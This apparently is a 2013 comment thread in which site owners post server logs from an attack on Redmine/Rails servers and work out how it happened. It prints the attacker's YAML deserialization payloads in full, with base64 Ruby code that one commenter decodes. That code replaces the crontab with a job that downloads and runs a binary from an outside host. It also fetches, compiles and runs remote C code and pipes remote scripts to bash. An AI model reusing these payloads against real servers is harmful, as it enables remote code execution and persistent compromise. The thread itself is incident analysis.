 17586: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "POST / HTTP/1.1" 302 778 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17587: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FmdalXTOJwb%3D---%2B%2521ruby%252Fhash%253AActionDispatch%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527LR%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ%253D%253D%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AOpenStruct%250A%2Btable%253A%250A%2B%2B%253Adefaults%253A%2B%257B%257D%250A HTTP/1.1" 200 3669 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17588: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "POST / HTTP/1.1" 302 904 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17589: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FkFsacuPKMjhdHgm%3D---%2B%2521ruby%252Fhash%253AActionController%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527BJmW%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ%253D%253D%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AActionController%253A%253ARouting%253A%253ARoute%250A%2Bsegments%253A%2B%255B%255D%250A%2Brequirements%253A%250A%2B%2B%2B%253AFXX%253A%250A%2B%2B%2B%2B%2B%253AxxqntMoR%253A%2B%253ANLOFpSw%250A HTTP/1.1" 200 3760 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17590  89.100.221.85 - - [24/May/2013:18:13:47 +0200] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17591  89.100.221.85 - - [24/May/2013:18:14:00 +0200] "-" 400 0 "-" "-" "-"
 .....
 17628  89.100.221.85 - - [24/May/2013:20:39:12 +0200] "-" 400 0 "-" "-" "-"
 17629: 88.198.20.247 - - [24/May/2013:21:14:04 +0200] "POST / HTTP/1.1" 302 1200 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17630: 88.198.20.247 - - [24/May/2013:21:14:04 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgGpc3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycpCgY6BkVUOgxAbWV0aG9kOgtyZXN1bHQ%253D%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A HTTP/1.1" 200 3948 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17631: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "POST / HTTP/1.1" 302 706 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17632: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FmdalXTOJwb%3D---%2B%2521ruby%252Fhash%253AActionDispatch%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527LR%253B%2Beval%2528%2525%255Bc3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AOpenStruct%250A%2Btable%253A%250A%2B%2B%253Adefaults%253A%2B%257B%257D%250A HTTP/1.1" 200 3601 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17633: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "POST / HTTP/1.1" 302 832 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17634: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FkFsacuPKMjhdHgm%3D---%2B%2521ruby%252Fhash%253AActionController%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527BJmW%253B%2Beval%2528%2525%255Bc3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AActionController%253A%253ARouting%253A%253ARoute%250A%2Bsegments%253A%2B%255B%255D%250A%2Brequirements%253A%250A%2B%2B%2B%253AFXX%253A%250A%2B%2B%2B%2B%2B%253AxxqntMoR%253A%2B%253ANLOFpSw%250A HTTP/1.1" 200 3691 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17635  89.100.221.85 - - [24/May/2013:21:40:43 +0200] "-" 400 0 "-" "-" "-"
 17636  89.100.221.85 - - [24/May/2013:21:44:10 +0200] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 .....
 17836: 88.198.20.247 - - [24/May/2013:23:10:01 +0200] "POST / HTTP/1.1" 302 1396 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17837: 88.198.20.247 - - [24/May/2013:23:10:02 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%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%253D%253D%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A HTTP/1.1" 200 4142 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17838: 88.198.20.247 - - [24/May/2013:23:10:03 +0200] "POST / HTTP/1.1" 302 894 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17839: 88.198.20.247 - - [24/May/2013:23:10:03 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FmdalXTOJwb%3D---%2B%2521ruby%252Fhash%253AActionDispatch%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527LR%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AOpenStruct%250A%2Btable%253A%250A%2B%2B%253Adefaults%253A%2B%257B%257D%250A HTTP/1.1" 200 3790 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17840: 88.198.20.247 - - [24/May/2013:23:10:03 +0200] "POST / HTTP/1.1" 302 1020 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17841: 88.198.20.247 - - [24/May/2013:23:10:04 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FkFsacuPKMjhdHgm%3D---%2B%2521ruby%252Fhash%253AActionController%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527BJmW%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AActionController%253A%253ARouting%253A%253ARoute%250A%2Bsegments%253A%2B%255B%255D%250A%2Brequirements%253A%250A%2B%2B%2B%253AFXX%253A%250A%2B%2B%2B%2B%2B%253AxxqntMoR%253A%2B%253ANLOFpSw%250A HTTP/1.1" 200 3880 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17842  80.108.82.117 - - [25/May/2013:00:01:49 +0200] "f\xA9\xA4\xFAo\x7F\xD0\xD6\xCB\x05\x83T\x82\xE7\x18\xDF\xD9p\x94\x80\xA6FY89g;\xDA}\xFDE9A\xF1P|\xBB\xF1\xA9\xFD\xE0\xDB\xCC_\x9A\x9C1\x89t\xADj\x10\xED\x9B\xF4\x8E*\xB8\x941\xF5+\x0B.&\xC5\x97,Q\xB8\x04\x85" 400 166 "-" "-" "-"

Here (I don't know how..) he compiled the C program (in my case "k.c" & "sh.py").
And he tries to access my root account.

nginx/error.log

 1848  /home/my_login/.rvm/gems/ruby-1.9.3-p327/gems/activesupport-3.2.9/lib/active_support/dependencies.rb:251:in `block in require': iconv will be deprecated in the future, use String#encode instead.
 1849: --2013-05-24 21:14:01--  http://88.198.20.247/k.c
 1850: Connecting to 88.198.20.247:80... connected.
 1851  HTTP request sent, awaiting response... 200 OK
 1852  Length: 18854 (18K) [text/x-csrc]
 ....
 1858  
 1859  /tmp/k.c:91:6: warning: conflicting types for built-in function 'pow' [enabled by default]
 1860: Lockfile found. Exiting.--2013-05-24 21:14:04--  http://88.198.20.247/k.c
 1861: Connecting to 88.198.20.247:80... connected.
 1862  HTTP request sent, awaiting response... 200 OK
 1863  Length: 18854 (18K) [text/x-csrc]
 ....
 1878  [ pid=856 thr=3065412416 file=ext/nginx/HelperAgent.cpp:923 time=2013-05-24 21:49:42.117 ]: Couldn't forward the HTTP response back to the HTTP client: It seems the user clicked on the 'Stop' button in his browser.
 1879  [ pid=856 thr=3066215232 file=ext/nginx/HelperAgent.cpp:923 time=2013-05-24 21:50:29.5 ]: Couldn't forward the HTTP response back to the HTTP client: It seems the user clicked on the 'Stop' button in his browser.
 1880: --2013-05-24 23:10:00--  http://88.198.20.247/k.c
 1881: Connecting to 88.198.20.247:80... connected.
 1882  HTTP request sent, awaiting response... 200 OK
 1883  Length: 18854 (18K) [text/x-csrc]
 ....
 1889  
 1890  /tmp/k.c:91:6: warning: conflicting types for built-in function 'pow' [enabled by default]
 1891: Lockfile found. Exiting.--2013-05-24 23:10:02--  http://88.198.20.247/k.c
 1892: Connecting to 88.198.20.247:80... connected.
 1893  HTTP request sent, awaiting response... 200 OK
 1894  Length: 18854 (18K) [text/x-csrc]

 1906  HTTP request sent, awaiting response... 200 OK
 1907  Length: 2252 (2.2K) [text/plain]
 1908: Saving to: `/tmp/sh.py'
 1909  
 1910       0K ..                                                    100% 7.73M=0s
 1911  
 1912: 2013-05-25 00:36:30 (7.73 MB/s) - `/tmp/sh.py' saved [2252/2252]
 1913  
 1914  sudo: no tty present and no askpass program specified

2013-05-24 23:10:02 (218 KB/s) - `/tmp/k.c' saved [18854/18854]

/tmp/k.c:91:6: warning: conflicting types for built-in function 'pow' [enabled by default]
Lockfile found. Exiting.Lockfile found. Exiting.sh: 1: Syntax error: "(" unexpected
--2013-05-25 00:36:29--  http://starfall.cu.cc/chips.txt
Resolving starfall.cu.cc (starfall.cu.cc)... 37.221.166.32
Connecting to starfall.cu.cc (starfall.cu.cc)|37.221.166.32|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2252 (2.2K) [text/plain]
Saving to: `/tmp/sh.py'

     0K ..                                                    100% 7.73M=0s

2013-05-25 00:36:30 (7.73 MB/s) - `/tmp/sh.py' saved [2252/2252]

sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: 3 incorrect password attempts
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: 3 incorrect password attempts
telnet: Unable to connect to remote host: Connection refused
telnet: Unable to connect to remote host: Connection refused
Connection closed by foreign host.
telnet: Unable to connect to remote host: Connection refused
Connection closed by foreign host.
Connection closed by foreign host.
Connection closed by foreign host.
/home/remy/.rvm/gems/ruby-1.9.3-p327/gems/activesupport-3.2.9/lib/active_support/dependencies.rb:251:in `block in require': iconv will be deprecated in the future, use String#encode instead.

I looked at "k.c" and I have the impression he uses an IRC server... on "cvv4you.ru" & "188.190.124.120" -> channel '#rails'
He runs the program with a fake name "- bash"; I saw that in the process list with htop.

I think we have to warn all RoR developers...

@bu2

bu2 commented May 26, 2013

Salut Remy,

Thanks for putting your log because I found something really interesting in the GET /login?back_url= request that you pointed out:

The 'back_url' is URL-encoded twice:

$ irb
1.9.3p392 :002 > s = '/login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A'

1.9.3p392 :003 > CGI.unescape s
=> "/login?back_url=http://82.239.203.55/?id=%0A---%0A%21ruby%2Fobject%3AGem%3A%3ARequirement%0Arequirements%3A%0A++-+%21ruby%2Fobject%3ARack%3A%3ASession%3A%3AAbstract%3A%3ASessionHash%0A++++++env%3A%0A++++++++HTTP_COOKIE%3A+%22a%3DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0%22%0A++++++by%3A+%21ruby%2Fobject%3ARack%3A%3ASession%3A%3ACookie%0A++++++++coder%3A+%21ruby%2Fobject%3ARack%3A%3ASession%3A%3ACookie%3A%3ABase64%3A%3AMarshal+%7B%7D%0A++++++++key%3A+a%0A++++++++secrets%3A+%5B%5D%0A++++++exists%3A+true%0A"

1.9.3p392 :004 > CGI.unescape CGI.unescape s
=> "/login?back_url=http://82.239.203.55/?id=\n---\n!ruby/object:Gem::Requirement\nrequirements:\n - !ruby/object:Rack::Session::Abstract::SessionHash\n env:\n HTTP_COOKIE: "a=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0"\n by: !ruby/object:Rack::Session::Cookie\n coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}\n key: a\n secrets: []\n exists: true\n"

Then the 'HTTP_COOKIE' value is a base64 blob:

$ base64 -d <(echo BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0)
o:@activesupport::Deprecation::DeprecatedInstanceVariableProxy:@instanceoERB�: @srci"��system('crontab -r')
system('(crontab -l ; echo "1 * * * * wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k") | crontab -')
system('wget -O /dev/null 188.190.124.120/req/log.php')
�:�ET:
@method:
resu

And so we can see that with this specially crafted request, the bad guy is able to run Ruby code which erases the user-level crontab and replaces it with his own.

I don't know exactly how it works; it might be related to the Rack security issue disclosed earlier this year (or perhaps an undisclosed vulnerability...).

Thanks again for the log!

Regards.

@Netmisa

Netmisa commented May 26, 2013

Hello,

It's pleasure, as we know now what it is about. :)

Regards

@Leglaw

Leglaw commented May 26, 2013

In my case it was PhpMyAdmin. 92.37.71.185 started probing my server starting about 10 hours ago.

@marutosi

What version is your Redmine?
Redmine 2.3.1 uses Rails 3.2.13.
http://www.redmine.org/projects/redmine/repository/entry/tags/2.3.1/Gemfile#L3

@marutosi

Redmine provides Security Advisories.
http://www.redmine.org/projects/redmine/wiki/Security_Advisories
Did you check it?

@Netmisa

Netmisa commented May 27, 2013

My version is 2.2.
No, I didn't check that before; I should have... :/
I did open a ticket on redmine.org (http://www.redmine.org/issues/14152).

@Leglaw : What is your PhPMyAdmin version ?

@marutosi

2.2.x?
2.2.3 has Ruby on Rails vulnerability.

@bu2

bu2 commented May 27, 2013

As for me, I am on Rails 3.2.8 with a custom application.

I have spotted 3 IPs which were sending malicious requests to one of our servers:
88.198.20.247
95.138.186.181
188.190.126.105

The malicious requests are messing with YAML parameters and the session cookie.
Here are some extracts of the log with the malicious requests:

from 88.198.20.247:

Started GET "/" for 88.198.20.247 at 2013-05-24 12:50:17 +0000
Processing by PagesController#show as HTML
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (0.5ms)
Rendered layouts/_head.html.erb (3.8ms)
Rendered layouts/_social_links.html.erb (1.5ms)
Rendered layouts/_messages.html.haml (0.3ms)
Rendered layouts/_header.html.erb (0.9ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:14 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (0.9ms)
Rendered layouts/_head.html.erb (6.4ms)
Rendered layouts/_social_links.html.erb (2.8ms)
Rendered layouts/_messages.html.haml (3.6ms)
Rendered layouts/_header.html.erb (1.7ms)
Rendered layouts/_menu.html.erb (0.9ms)
Rendered layouts/_my_favs.html.haml (4.5ms)

Rendered layouts/_ride_request_form.html.erb (15.2ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:15 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ==].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.2ms)
Rendered layouts/_head.html.erb (6.2ms)
Rendered layouts/_social_links.html.erb (1.5ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.8ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (4.5ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:16 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ==].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.6ms)
Rendered layouts/_head.html.erb (4.3ms)
Rendered layouts/_social_links.html.erb (1.2ms)
Rendered layouts/_messages.html.haml (0.3ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.9ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:30 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (91.0ms)
Rendered layouts/_head.html.erb (7.8ms)
Rendered layouts/_social_links.html.erb (3.1ms)
Rendered layouts/_messages.html.haml (3.9ms)
Rendered layouts/_header.html.erb (1.5ms)
